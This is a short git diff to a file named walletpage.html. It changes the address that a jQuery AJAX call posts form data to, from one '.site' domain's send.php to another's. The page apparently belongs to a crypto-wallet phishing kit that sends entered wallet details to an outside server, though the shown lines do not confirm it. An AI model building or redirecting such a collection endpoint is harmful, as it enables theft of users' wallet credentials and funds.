Update walletpage.html 3

--- a/walletpage.html
+++ b/walletpage.html
@@ -605,7 +605,7 @@
            // alert('it works here 1');
             $.ajax({
                 type: "POST",
-                url: "https://adcglobal.site/send/send.php",
+                url: "https://fxcapitalgrowth.site/send/send.php",
                 data: formData,
                 cache: false,
                 contentType: false,
